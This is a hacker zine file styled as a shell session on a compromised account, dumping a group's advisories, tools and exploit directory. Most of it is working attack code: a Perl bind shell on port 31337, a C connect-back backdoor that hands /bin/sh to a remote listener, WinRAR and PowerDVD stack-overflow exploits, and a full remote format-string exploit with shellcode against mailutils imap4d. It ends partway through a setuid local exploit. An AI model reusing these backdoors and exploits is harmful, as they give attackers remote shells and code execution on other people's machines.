Mirrors/Zines
1
0
Fork 0
mirror of https://github.com/fdiskyou/Zines.git synced 2025-03-09 00:00:00 +01:00
Code Issues Releases Wiki Activity
Zines/dikline/unl.txt
fdiskyou 180dfff1cc bring back some more
2017-12-10 21:54:57 +00:00

2253 lines
70 KiB
Text
Raw Blame History

#dk/archives
#unlocked.(o/1043)
#by: flsh
#little taste of n0tm3..
Linux link 2.6.11-NX.2-link #3 SMP Sun May 29 00:47:02 MSD 2005 i686 i686 i386 GNU/Linux
uid=1070(unl0ck) gid=600(customers) groups=99(nobody)
$ echo diklined!@#
diklined!@#
$ pwd
/home/u/unl0ck/
$ ls
UnPack access_log access_log.1.gz chx lp m00-samba-pwnd.tar.bz2 photo priv8 public_html xtix
$ cd xtix
$ ls
public_html
$ cd public_html/
$ ls
cgi-bin olly.jpg oplist.txt
$ cat oplist.txt
op list:
A-WaRZ
crash-x
xtix
linuxg0d
n2n
roberto_
rvr
SpiderZ
r-Master
rD
shellcode
if i fogot sorry, tell A-WaRZ to tell me to add you.
$ cd ../../
$ cd UnPack/
$ ls
advisories larkit(priv8_in_progress).tar.gz tools
$ ls *
larkit(priv8_in_progress).tar.gz
advisories:
G00DTechTelnetD.txt editpad.txt htget.txt http_trace.txt letzdance.txt mollenftp.txt powerdvd.txt webx_lite.txt win_ftp.exe.txt winftp.txt zebedee.txt
tools:
b0f_research.rar search_in_files.pl
$ cat advisories/
G00DTechTelnetD.txt editpad.txt htget.txt http_trace.txt letzdance.txt mollenftp.txt powerdvd.txt webx_lite.txt win_ftp.exe.txt winftp.txt zebedee.txt
$ cat advisories/htget.txt
htget-0.9.x stack overflow vulnerability
number: #16
author: darkeagle
mail: darkeagle [at] linkin-park [dot] cc || darkeagle [at] unl0ck [dot] org
date: 01.12.04
vendor: dunno
status: vendor dunno about bug :)
overview:
HTGET is a file grabber that will get files from HTTP servers.
The aim behind this program is to create a downloader that you can leave
running in the background - one that's totally reliable and can cope with
just about any problem, and won't stop downloading unless it's forced to.
details:
...
}
else if ( strncasecmp ( argv [ I ] , "--downloadsdir=" , 15 ) == 0 )
{
strcpy ( DownloadsDir , & argv [ I ][ 15 ] ) ;
...
solution:
use wget :)
exploit:
lame local r00t xpl you can find there.
greetz:
all unl0ckerz, nosystemz, ghc'z
(c) uKt Research
2004-2005
http://unl0ck.org
$ ls
advisories larkit(priv8_in_progress).tar.gz tools
$ cat advisories/G00DTechTelnetD.txt
GoodTech Telnet Server <= latest version DoS vulnerability
number: #20
author: darkeagle
mail: darkeagle [at] linkin-park [dot] cc || darkeagle [at] unl0ck [dot] org
date: 16.03.05
vendor: http://asus.com
$ ls tools/
b0f_research.rar search_in_files.pl
$ cd tools/
$ ls
b0f_research.rar search_in_files.pl
$ cat search_in_files.pl
#!/usr/bin/perl
###################.................
## Script for search in
# files by keyword
# (c) .uKt Research 2005
# http://www.unl0ck.org
# nekd0@unl0ck.org
###################.................
print "Please type logfile name \n(if file exists,all data will be removed) : ";
chomp($log=<STDIN>);
open (LOG,">$log") or die("Can't open log file.\n");
print "Please type path to directory (e.q. /home/nekd0) : ";
chomp($start=<STDIN>);
print "Searching for text files in $start\t\t\t\t";
@files=split(/\n/,`ls -F $start`) or die();
foreach $file(@files)
{$pathtofile="$start/$file";
if (-d $pathtofile){push (@globaldirs,$pathtofile);}
if (-T $pathtofile){push (@txt,$pathtofile);}}
foreach $filename(@globaldirs){
@files=split(/\n/,`ls -F $filename`);
foreach $file(@files)
{$file="$filename$file";
if (-d $file){push (@globaldirs,$file);}
if (-T $file){push(@txt,$file)}
}
}
print "[ OK ]\n";
print "Please type key for serach (e.q. strcpy) : ";
chomp($need=<STDIN>);
print "Searching for $need in finded text files";
print "\t\t\t\t";
foreach $txt(@txt)
{
open(CAT,$txt);
@file_cont=<CAT>;
close(CAT);
$count=0;
foreach $line(@file_cont)
{$count++;
if ($line=~/$need/)
{print LOG "File : $txt\nOn line $count founded $line\n";}
}
}
close(LOG);
print "[ OK ]\n";
$ cd ../../
$ cd chx/public_html/
$ ls
UnBotX Unreal3.2.3.tar.gz bs.pl.txt cbd.c cgi-bin choix.css chx.png example.conf img index.htm
$ cat bs.pl.txt
use Socket;
$port = 31337;
socket (S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));
setsockopt (S, SOL_SOCKET, SO_REUSEADDR,1);
bind (S, sockaddr_in ($port, INADDR_ANY));
listen (S, 50);
while (1){
accept (X, S);
if (!($pid = fork)){
if(!defined $pid){exit(0);}
open STDIN,"<&X";
open STDOUT,">&X";
open STDERR,">&X";
exec("/bin/bash -i");
close X;}}
$ cat cbd.c
/* Digit-Labs Connect-Back Backdoor
*
* Use this backdoor to access
* machines behind firewalls.
*
* step 1. setup a listening port
* on your box e.g.
* nc -l -p 4000
*
* step 2. Run this file :
* ./cbd <ip_of_listening_machine>
*
* grazer@digit-labs.org
* http://www.digit-labs.org
*
*/
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <netdb.h>
int fd, sock;
int port = 4000;
struct sockaddr_in addr;
char mesg[] = "\n[ Digit-Labs Connect-Back Backdoor ]\n * Connected to CommandLine...
\n";
char shell[] = "/bin/sh";
int main(int argc, char *argv[]) {
while(argc<2) {
fprintf(stderr, "\n\n %s <ip> \n\n", argv[0]);
exit(0); }
addr.sin_family = AF_INET;
addr.sin_port = htons(port);
addr.sin_addr.s_addr = inet_addr(argv[1]);
fd = socket(AF_INET, SOCK_STREAM, 0);
connect(fd, (struct sockaddr*)&addr, sizeof(addr));
send(fd, mesg, sizeof(mesg), 0);
dup2(fd, 0); // thnx dvorak
dup2(fd, 1);
dup2(fd, 2);
execl(shell, "in.telnetd", 0);
close(fd);
return 1;
}
$ ls
UnBotX Unreal3.2.3.tar.gz bs.pl.txt cbd.c cgi-bin choix.css chx.png example.conf img index.htm
$ cd ../../
$ ls lp/public_html/
aa cgi-bin config.h darkircd-1.0b3FINAL-2.tar.gz exp.html ircd.conf mafaka.html mustdie.lnk ppp.hta stdexe.rar stdsource.rar webalizer xoce.html y0.exe
$ ls lp/public_html/*
lp/public_html/config.h lp/public_html/exp.html lp/public_html/mafaka.html lp/public_html/ppp.hta lp/public_html/stdsource.rar lp/public_html/y0.exe
lp/public_html/darkircd-1.0b3FINAL-2.tar.gz lp/public_html/ircd.conf lp/public_html/mustdie.lnk lp/public_html/stdexe.rar lp/public_html/xoce.html
lp/public_html/aa:
ppp.hta
lp/public_html/cgi-bin:
php5.cgi
lp/public_html/webalizer:
ctry_usage_200503.png ctry_usage_200505.png daily_usage_200503.png daily_usage_200505.png hourly_usage_200503.png hourly_usage_200505.png index.html usage.png usage_200504.html usage_200506.html
webalizer.current
ctry_usage_200504.png ctry_usage_200506.png daily_usage_200504.png daily_usage_200506.png hourly_usage_200504.png hourly_usage_200506.png update.php usage_200503.html usage_200505.html webalizer.conf
webalizer.hist
$ cd priv8/
$ ls
paperz xplz
$ cd paperz/
$ ls
G00DTechTelnetD.txt htget.txt letzdance.txt powerdvd.txt zebedee.txt
$ cat *
GoodTech Telnet Server <= latest version DoS vulnerability
number: #20
author: darkeagle
mail: darkeagle [at] linkin-park [dot] cc || darkeagle [at] unl0ck [dot] org
date: 16.03.05
vendor: http://asus.com
htget-0.9.x stack overflow vulnerability
number: #16
author: darkeagle
mail: darkeagle [at] linkin-park [dot] cc || darkeagle [at] unl0ck [dot] org
date: 01.12.04
vendor: dunno
status: vendor dunno about bug :)
overview:
HTGET is a file grabber that will get files from HTTP servers.
The aim behind this program is to create a downloader that you can leave
running in the background - one that's totally reliable and can cope with
just about any problem, and won't stop downloading unless it's forced to.
details:
...
}
else if ( strncasecmp ( argv [ I ] , "--downloadsdir=" , 15 ) == 0 )
{
strcpy ( DownloadsDir , & argv [ I ][ 15 ] ) ;
...
solution:
use wget :)
exploit:
lame local r00t xpl you can find there.
greetz:
all unl0ckerz, nosystemz, ghc'z
(c) uKt Research
2004-2005
http://unl0ck.org
winrar <= 3.42 (latest) stack overflow vulnerabilities
number: #17
author: darkeagle
mail: darkeagle [at] linkin-park [dot] cc || darkeagle [at] unl0ck [dot] org
date: 06.03.05
vendor: http://rarlabs.com
status: vendor dunno about bug :)
overview:
winrar is one of the best file compressor all over the world :)
details:
winrar has vulnerability, when user openning very long filename.
to overwrite EIP register, needs 509 bytes ( RUS version ).
another stupid stack overflow exist in winrar :)
when you create archive, put in "Archive name" following:
"uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu....\unl0ck.rar"
0x55 bytes over 500 :)
but if you put only filename like "unl00.....00ckkkkkkkkkkk.rar"
winrar msgz to you msg like "What The Fuck? Filename is t00 long!!!" :)
rarlabs thought that they can fuck up stupidz userz. yes. they fucked upped
stupidz userz with this protection, but UNL0CK RESEARCHERZ isn't stupidz userz! }:i
solution:
waiting new version of WinRAR program :)
exploit:
exploitz see here.
I used ret-2-func technique in my exploit and it tested only in WinXP SP2 RUS.
greetz:
all unl0ckerz, nosystemz, rosielloz, m00z, skew.
(c) uKt Research
2004-2005
http://unl0ck.org
powerdvd-asusdvd 4.0 (maybe others)
number: #18
author: darkeagle
mail: darkeagle [at] linkin-park [dot] cc || darkeagle [at] unl0ck [dot] org
date: 01.03.05
vendor: (?)
overview:
PowerDVD is powerfull DVD video player.
details:
simple stack overflow was founded when PowerDVD opens very long filename.
exploit:
PoC exploit is avaible from our site [ http://unl0ck.org ]
Exploit gives to you local shell (cmd.exe).
Tested on winxp sp0 rus with asusdvd 4.0.
greetz:
choix, nekd0, nosystemz, antiq, cr0n, edisan, forsyte, xtix, crash-x,
rave
(c) uKt Research
2004-2005
http://unl0ck.org
zebedee <= latest version stack overflow
number: #19
author: darkeagle
mail: darkeagle [at] linkin-park [dot] cc || darkeagle [at] unl0ck [dot] org
date: xx.01.05
vendor: http://asus.com
$ cd ..
$ ls
paperz xplz
$ cd xplz/
$ ls
0xLeTzDanCe.c 0xLeTzDanCeeng.c 0xLeTzDanCerus.c 0xletzdance.rar UNL0CK.txt imap4d.c pdvdx.cpp shoutdead.c un-D_0WNED.exe undee.c unreal.c xot.c
0xLeTzDanCe.exe 0xLeTzDanCeeng.exe 0xLeTzDanCerus.exe Ie-0day2.zip ie_0day m00seahouse-0.1.tar.gz priv8.tar.gz un-D_0WNED.c undead.c unreal-DOS.rar unxpcd.c
$ cat 0xLeTzDanCe.c
/*
local exploit for winrar <= 3.42 Universal Dir\Filename bug
by darkeagle
bug is 0day :)
was founded by darkeagle
i'm used ret-2-func technique.
*/
#include <stdio.h>
#include <string.h>
#include <windows.h>
int main ()
{
long sys_addr = 0x77C18044; // winxp sp0 rus targets...
long exit_addr = 0x77C27ADC;
long cmd_addr = 0x77C01335;
FILE *file;
char buf[3000];
char cmd[3000];
printf("\n * 0xLeTzDanCe - WinRAR <= 3.42 local exploit *\n * by darkeagle [http://unl0ck.void.ru]\n *\n\n");
file = fopen("UNL0CK.txt", "w+");
memset(buf, 0x00, 3000);
memset(cmd, 0x00, 3000);
memset(buf, 0x55, 527);
*(long*)&buf[strlen(buf)] = sys_addr;
*(long *)&buf[strlen(buf)] = exit_addr;
*(long *)&buf[strlen(buf)] = cmd_addr;
fprintf(file, "%s\n", buf);
fclose(file);
}
$ cat 0xLeTzDanCeeng.c
/*
local exploit for winrar <= 3.42 ENG version
by darkeagle
bug is 0day :)
was founded by darkeagle
i'm used ret-2-func technique.
*/
#include <stdio.h>
#include <string.h>
#include <windows.h>
int main ( int argc, char *argv[] )
{
long sys_addr = 0x77C18044; // winxp sp0 rus targets...
long exit_addr = 0x77C27ADC;
long cmd_addr = 0x77C01335;
char buf[3000];
char cmd[3000];
if ( argc < 2 )
{
printf("\n * 0xLeTzDanCe - WinRAR <= 3.42 local exploit ENG version *\n * by darkeagle [http://unl0ck.void.ru]\n * usage: 0xletzdance.exe <path_to_RAR>\n\n");
exit(0);
}
memset(buf, 0x00, 3000);
memset(cmd, 0x00, 3000);
memset(buf, 0x55, 516);
*(long*)&buf[strlen(buf)] = sys_addr;
*(long *)&buf[strlen(buf)] = exit_addr;
*(long *)&buf[strlen(buf)] = cmd_addr;
sprintf(cmd, "%s %s", argv[1], buf);
system(cmd);
}
$ cat 0xLeTzDanCerus.c
/*
local exploit for winrar <= 3.42 RUS version
by darkeagle
bug is 0day :)
was founded by darkeagle
i'm used ret-2-func technique.
*/
#include <stdio.h>
#include <string.h>
#include <windows.h>
int main ( int argc, char *argv[] )
{
long sys_addr = 0x77C18044; // winxp sp0 rus targets...
long exit_addr = 0x77C27ADC;
long cmd_addr = 0x77C01335;
char buf[3000];
char cmd[3000];
if ( argc < 2 )
{
printf("\n * 0xLeTzDanCe - WinRAR <= 3.42 local exploit RUS version *\n * by darkeagle [http://unl0ck.void.ru]\n * usage: 0xletzdance.exe <path_to_RAR>\n\n");
exit(0);
}
memset(buf, 0x00, 3000);
memset(cmd, 0x00, 3000);
memset(buf, 0x55, 509);
*(long*)&buf[strlen(buf)] = sys_addr;
*(long *)&buf[strlen(buf)] = exit_addr;
*(long *)&buf[strlen(buf)] = cmd_addr;
sprintf(cmd, "%s %s", argv[1], buf);
system(cmd);
}
$ cat UNL0CK.txt
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUD?w?z?w5?w
$ cat imap4d.c
#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>
//#define DEBUG
#define RETADDR (0x805d922)
#define SHELL_PORT "34563"
#define SHELL_COMMAND "uname -a; id;"
#define PORT_OFFSET 20
#define ARG_1_LENGH 180
#define ARG_3_LENGH 315
char shellcode[] =
"\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\x89\xe1\xb0\x66\xcd"
"\x80\x31\xd2\x52\x66\x68\x13\xd2\x43\x66\x53\x89\xe1\x6a"
"\x10\x51\x50\x89\xe1\xb0\x66\xcd\x80\x40\x89\x44\x24\x04"
"\x43\x43\xb0\x66\xcd\x80\x83\xc4\x0c\x52\x52\x43\xb0\x66"
"\xcd\x80\x93\x89\xd1\xb0\x3f\xcd\x80\x41\x80\xf9\x03\x75"
"\xf6\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3"
"\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
void prepare(char *arg){
int port=htons(atoi(arg)), p1, p2;
p2 = (port & 0xff00) >> 8;
p1 = (port & 0x00ff);
shellcode[PORT_OFFSET] = p1;
shellcode[PORT_OFFSET+1] = p2;
printf("Shellcode lenght=%d; port=%d\n", strlen(shellcode), atoi(arg));
}
struct framep {
int addr;
unsigned short dpa_offset;
};
struct targ{
unsigned int retloc; /* the eip */
/*
* possible retaddrs, we have to bruteforce a
* little bit to find the username field on heap
*/
int pretaddr[10];
int ret_count;
struct framep ebps[8];
int ebp_count;
int use_ebp1;
int use_ebp2;
unsigned short ebp1_offset; /* DPA offset of the first ebp */
unsigned short ebp2_offset;
unsigned short retl_high_offset; /* DPA offset of high part of the retloc */
unsigned short retl_low_offset;
} target;
void usage(char *a){
int i;
printf("[-] Usage: %s -h <host> [options]\n", a);
printf("[!] Options:\n");
printf("\t\t-h\tHostname which you want attack (required)\n");
printf("\t\t-p\tPort of the imapd (default: 143)\n");
printf("\t\t-s\tHow long to sleep before try connect to shell (default: 1)\n");
exit(1);
}
int sockprintf(int sock, const char *s, ...){
char *ptr;
int bytes;
va_list arg;
va_start(arg, s);
if(vasprintf(&ptr, s, arg) == -1){
free(ptr);
return -1;
}
va_end(arg);
if((bytes = send(sock, ptr, strlen(ptr), 0)) == -1){
free(ptr);
return -1;
}
free(ptr);
return bytes;
}
int statusf(const char *s, ...){
va_list arg;
va_start(arg, s);
vprintf(s, arg);
fflush(stdout);
}
int resolv(struct sockaddr_in *addr, char *hostn){
struct hostent *host;
if (!inet_aton(hostn, &addr->sin_addr)){
host = gethostbyname(hostn);
if (host == NULL){
printf("[-] Wasnt able to resolve %s!\n", hostn);
return -1;
}
addr->sin_addr = *(struct in_addr*)host->h_addr;
}
}
int conn(struct sockaddr_in addr, int port){
int sock;
if((sock = socket(PF_INET, SOCK_STREAM, 0)) == -1){
return -1;
}
addr.sin_port = htons(port);
addr.sin_family = AF_INET;
if (connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1){
return -1;
}
return sock;
}
int get_shell(struct sockaddr_in addr, int port, int sleeps){
int sock;
char buffer[1024];
fd_set fds;
sleep(sleeps);
if((sock = conn(addr, port)) == -1)
return (-1);
printf("[+]\n[+] Wooohooo we got a shell!\n");
sockprintf(sock, SHELL_COMMAND"\r\n");
while(1){
FD_ZERO(&fds);
FD_SET(0, &fds);
FD_SET(sock, &fds);
if (select(255, &fds, NULL, NULL, NULL) == -1){
fprintf(stderr,"[-] sending failed\n");
close(sock);
exit(1);
}
memset(buffer, 0x0, sizeof(buffer));
if (FD_ISSET(sock, &fds)){
if (recv(sock, buffer, sizeof(buffer), 0) == -1){
fprintf(stderr, "[-] Connection closed by remote host!\n");
close(sock);
exit(1);
}
fprintf(stderr, "%s", buffer);
}
if (FD_ISSET(0, &fds)){
read(0, buffer, sizeof(buffer));
write(sock, buffer, strlen(buffer));
}
}
return 0;
}
void status(int retloc, int retloc2, int retaddr){
static int i=1;
switch(i){
case 1:
printf("[|] ");
break;
case 2:
printf("[/] ");
break;
case 3:
printf("[-] ");
break;
case 4:
printf("[\\] ");
i = 0;
break;
}
printf("Trying retlocs [0x%x - 0x%x] retaddr [0x%x]\r", retloc, retloc2, retaddr);
fflush(stdout);
i++;
}
void gen_req2(char *buffer, unsigned int size, unsigned short count){
unsigned short high, low;
high = (target.pretaddr[count] & 0xffff0000) >> 16;
low = (target.pretaddr[count] & 0x0000ffff);
memset(buffer, 0x0, size);
snprintf(buffer, size, "%%.%uu%%%d$hn%%.%uu%%%d$hn",
high, target.retl_high_offset, (low-high), target.retl_low_offset, shellcode);
buffer[size-1] = 0x0;
if(strlen(buffer) > 135){
printf("[-] get_info failed, this really shouldnt happen...\n");
exit(-1);
}
memset(buffer + strlen(buffer), 0x41, 135 - strlen(buffer));
strncat(buffer, " LOGIN ", size - strlen(buffer) - 1);
memset(buffer + strlen(buffer), 0x90, 353);
if(strlen(shellcode) > 350){
printf("[-] The shellcode (%d bytes) is too big, maximal size is 350\n", strlen(shellcode));
exit(-1);
}
memcpy(buffer + strlen(buffer) - strlen(shellcode) - 2, shellcode, strlen(shellcode));
buffer[strlen(buffer)] = ' ';
strncat(buffer, "BBBB", size - strlen(buffer) - 1);
}
void gen_req1(char *buffer, unsigned int size){
unsigned short retl;
retl = (target.retloc & 0x0000ffff);
memset(buffer, 0x0, size);
snprintf(buffer, size, "%%.%uu%%%d$hn__%%%d$hn",
retl, target.ebps[target.ebp_count - 2].dpa_offset, target.ebps[target.ebp_count - 1].dpa_offset);
buffer[size-1] = 0x0;
if(strlen(buffer) > 135){
printf("[-] get_info failed, this really shouldnt happen, wtf did you do?\n");
exit(-1);
}
memset(buffer + strlen(buffer), 0x41, ARG_1_LENGH - strlen(buffer));
strncat(buffer, " LOGIN ", size - strlen(buffer) - 1);
memset(buffer + strlen(buffer), 0x41, ARG_3_LENGH);
strncat(buffer, " BBBB", size - strlen(buffer) - 1);
}
void gen_info_req(char *buffer, unsigned int size, int offset){
int i;
memset(buffer, 0x0, size);
if(offset == 0)
for(i = 0; i < 60; i++)
strncat(buffer, "_%p", size - strlen(buffer) - 1);
else
for(i = 0; i < 30; i++)
snprintf(buffer + strlen(buffer), size - strlen(buffer), "_%%%d$p", offset+i);
strncat(buffer, " LOGIN ", size - strlen(buffer) - 1);
memset(buffer + strlen(buffer), 0x41, ARG_3_LENGH);
strncat(buffer, " BBBB", size - strlen(buffer) - 1);
}
void get_infos(int sock){
char buffer[1024], ibuffer[1024], *ptr, *ptr2;
int i, j, bytes, ebp_count, ebps[10], ebp_tmp, offset, ret_tmp;
gen_info_req(ibuffer, sizeof(ibuffer), 0);
#ifdef DEBUG
printf("[D] Sending: %s\n", ibuffer);
#endif
if(sockprintf(sock, "%s\r\n", ibuffer) == -1){
printf("[-] Wasnt able to determine infos\n");
exit(-1);
}
if((bytes = recv(sock, buffer, sizeof(buffer) - 1, 0)) == -1){
printf("[-] Wasnt able to determine infos\n");
exit(-1);
}
buffer[bytes] = 0x0;
#ifdef DEBUG
printf("[D] Recived: %s\n", buffer);
#endif
memset(&target, 0x0, sizeof(target));
ptr = buffer;
for(i = 1; (ptr = strchr(ptr, '_')); i++){
ptr++;
if(!strncmp(ptr, "0xbfff", 6) && target.ebp_count < 8){
ebp_tmp = strtoul(ptr,NULL,0);
if(!(ptr = strchr(ptr, '_'))){
i++;
continue;
}
ptr++;
i++;
if(strncmp(ptr, "0x80", 4) && strncmp(ptr, "0x080", 5)
&& strncmp(ptr, "0x40", 4) && strncmp(ptr, "0x040", 5))
continue;
for(j = 0; j < target.ebp_count; j++)
if(target.ebps[j].addr == ebp_tmp)
ebp_tmp = 0x0;
if(ebp_tmp == 0x0)
continue;
target.ebps[target.ebp_count].addr = ebp_tmp;
target.ebps[target.ebp_count].dpa_offset = i - 1;
#ifdef DEBUG
printf("[D] Found possible ebp: %p offset: %d\n",
target.ebps[target.ebp_count].addr, target.ebps[target.ebp_count].dpa_offset);
#endif
target.ebp_count++;
continue;
}
/*
* In the function util_do_command a pointer to the username is stored. username
* points to the second "word" of the string which we send. if we send always a
* string and with 4 "words", which have in each request the same lengh,
* (word 1: 135bytes, string " LOGIN ", word 3: 353 bytes and word 4: 4 bytes,
* we will get always the same chunk of memory from malloc. So the address where
* username points to will always point to our 3. word, which will be in the last
* request our shellcode.
* The problem is, we know only that our string is on the heap, but there are a lot
* of pointers to addresses that could be the heap. so we just copy the first 10 pointers
* to 0x80* and try later each of them. bruteforcing 10 addresses wont take too long,
* But it will flood the logs :/
*/
if(target.ret_count < 10 && !strncmp(ptr, "0x80", 4) || !strncmp(ptr, "0x080", 5)){
ret_tmp = strtoul(ptr,NULL,0);
for(j = 0; j < target.ret_count; j++)
if(target.pretaddr[j] == ret_tmp)
ebp_tmp = 0x0;
if(ebp_tmp == 0x0)
continue;
target.pretaddr[target.ret_count] = ret_tmp;
#ifdef DEBUG
printf("[D] Added %p to the possible retaddr table\n", target.pretaddr[target.ret_count]);
#endif
target.ret_count++;
}
}
target.retloc = target.ebps[0].addr + 4;
target.use_ebp1 = target.ebp_count - 2;
target.use_ebp2 = target.ebp_count - 1;
#ifdef DEBUG
printf("[D] retloc: %p\n", target.retloc);
#endif
/*
* when we send this, the first two bytes of where target.ebp1 und target.ebp2 point to
* will be overwritten with the first to bytes of target.retloc and target.retloc+2.
* These can later be used to overwrite the saved eip of util_do_commands.
*/
gen_req1(buffer, sizeof(buffer));
#ifdef DEBUG
printf("[D] Press enter to continue\n");
getchar();
#endif
sockprintf(sock, "%s\r\n", buffer);
#ifdef DEBUG
printf("[D] Sent: %s\n", buffer);
#endif
memset(buffer, 0x0, sizeof(buffer));
while((bytes = recv(sock, buffer, sizeof(buffer) - 1, 0))){
buffer[bytes] = 0x0;
if(strstr(buffer, "\r\n"))
break;
}
for(i = 0, offset = target.ebps[target.ebp_count - 2].dpa_offset; i < 4; i++){
gen_info_req(ibuffer, sizeof(ibuffer), offset);
sockprintf(sock, "%s\r\n", ibuffer);
#ifdef DEBUG
printf("[D] Sent ibuf: %s\n", ibuffer);
#endif
if((bytes = recv(sock, buffer, sizeof(buffer) - 1, 0)) == -1){
printf("[-] Wasnt able to determine infos\n");
exit(-1);
}
buffer[bytes] = 0x0;
#ifdef DEBUG
printf("[D] Recived ibuf: %s\n", buffer);
#endif
ptr = buffer;
for(j = 1; (ptr = strchr(ptr, '_')); j++){
ptr++;
if(target.retl_low_offset == 0 && strtoul(ptr, NULL, 0) == target.retloc)
target.retl_low_offset = j + offset - 1;
else if(target.retl_high_offset == 0&& strtoul(ptr, NULL, 0) == target.retloc + 2 )
target.retl_high_offset = j + offset - 1;
}
#ifdef DEBUG
printf("rl low: %d rl high %d\n", target.retl_low_offset, target.retl_high_offset);
#endif
if(target.retl_low_offset != 0 && target.retl_high_offset != 0)
break;
offset += 30;
}
if(target.retl_low_offset == 0 || target.retl_high_offset == 0){
printf("[-] Wasnt able to find retloc on stack\n");
exit(-1);
}
#ifdef DEBUG
printf("[D] Retloc low offset: %d Retloc high offset: %d\n", target.retl_low_offset, target.retl_high_offset);
#endif
}
int main(int argc, char **argv){
char *payload = NULL, *hostn = NULL, buffer[1024], *ptr;
int i, first, sock, opt, port = 143,
shell_port = atoi(SHELL_PORT), sleeps = 1,
p_size=10000, vulncheck = 1, bytes;
fd_set fds;
struct sockaddr_in addr;
int p1, p2, ip1, ip2, ip3, ip4, sport;
char *back = "192.168.1.2";
sport = atoi(SHELL_PORT);
printf("[!] mailutils imapd4d universal(?) exploit 0.5 by crash-x / unl0ck / scozar\n");
if (argc < 2)
usage(argv[0]);
while ((opt = getopt (argc, argv, "h:p:t:s:P:S:c:vV")) != -1){
switch (opt){
case 'h':
hostn = optarg;
break;
case 'p':
port = atoi(optarg);
if(port > 65535 || port < 1){
printf("[-] Port %d is invalid\n",port);
return 1;
}
break;
case 's':
sleeps = atoi(optarg);
break;
case 'P':
prepare(optarg);
break;
case 'c':
back = optarg;
break;
case 'V':
vulncheck = 0;
break;
default:
usage(argv[0]);
}
}
if(hostn == NULL)
usage(argv[0]);
resolv(&addr, hostn);
printf("[!] Connecting to %s\n", hostn);
if((sock = conn(addr, port)) == -1){
printf("[-] Connecting failed!\n");
return -1;
}
printf("[+] Connected!\n");
recv(sock, buffer, sizeof(buffer), 0);
get_infos(sock);
printf("[+] We got all infos, which we need, lets start!\n");
close(sock);
for(i = 0; i < target.ret_count; i++) {
statusf("[%d] Trying retaddr %p\r", i+1, target.pretaddr[i]);
if((sock = conn(addr, port)) == -1){
printf("[-] Connecting failed!\n");
return -1;
}
if(!(bytes = recv(sock, buffer, sizeof(buffer), 0))){
printf("[-] Wasnt able to recive data from server\n");
exit(-1);
}
gen_req1(buffer, sizeof(buffer));
sockprintf(sock, "%s\r\n", buffer);
while((bytes = recv(sock, buffer, sizeof(buffer) - 1, 0)) > 0){
buffer[bytes] = 0x0;
if(strstr(buffer, "\r\n"))
break;
}
gen_req2(buffer, sizeof(buffer), i);
#ifdef DEBUG
printf("[D] Press enter to continue\n");
getchar();
#endif
sockprintf(sock, "%s\r\n", buffer);
while((bytes = recv(sock, buffer, sizeof(buffer) - 1, 0)) > 0){
buffer[bytes] = 0x0;
if(strstr(buffer, "\r\n"))
break;
}
#ifdef DEBUG
printf("[D] Press enter to continue\n");
getchar();
#endif
close(sock);
get_shell(addr, 5074, 1);
}
printf("[-] Exploit failed\n");
return 0;
}
$ cat pdvdx.cpp
/*
\ PowerDVD <= 4.? local win32 exploit
/ exploited by darkeagle, discovered by darkeagle
\
/ PoC exploit runs cmd.exe on WinXP SP0 Rus
\ Using ret2func technique :)
/
\ greetz: unl0ckerz { nekd0, xtix, crash-x, choix, antiq, 8ron, 0xdeadbabe }, CoKi, rave etc.
/
\ mailto: darkeagle [at] unl0ck [dot] org
/ darkeagle [at] linkin-park [dot] cc
\ http://unl0ck.org
/
\
*/
#include <stdio.h>
#include <string.h>
#include <windows.h>
int main(int argc, char *argv[])
{
char cmd[500];
char *path;
printf("\n\n* PowerDVD <= 4.0 local exploit *\n\tby darkeagle\n\nusage: pdvdx.exe <path>\n\n");
if ( argc < 2 ) { printf(" need an argument!\n"); exit(0); }
path = argv[1];
sprintf(cmd, "%s ", path);
strcat(cmd, "\x44\x80\xC1\x77");
strcat(cmd, "\xDC\x7A\xC2\x77");
strcat(cmd, "\x35\x13\xC0\x77");
memset(cmd+strlen(cmd), 0x55, 299);
system(cmd);
exit(0);
}
$ cat xot.c
#include <stdio.h>
#include <setjmp.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/shm.h>
#include <signal.h>
#include <setjmp.h>
#include <sys/mman.h>
#include <fcntl.h>
#define PSIZE 0x1000
#define PCOUNT 0x00000001
#define SIZE PCOUNT*PSIZE
#define SUID "/usr/sbin/traceroute"
#define ARG "yahoo.com"
struct s_suids {
char *file;
};
struct s_suids suids[] = {
{"/usr/bin/at"},
{"/usr/bin/atq"},
{"/usr/bin/atrm"},
{"/usr/bin/batch"},
{"/usr/bin/chpass"},
{"/usr/bin/chfn"},
{"/usr/bin/chsh"},
{"/usr/bin/ypchpass"},
{"/usr/bin/ypchfn"},
{"/usr/bin/ypchsh"},
{"/usr/bin/keyinfo"},
{"/usr/bin/keyinit"},
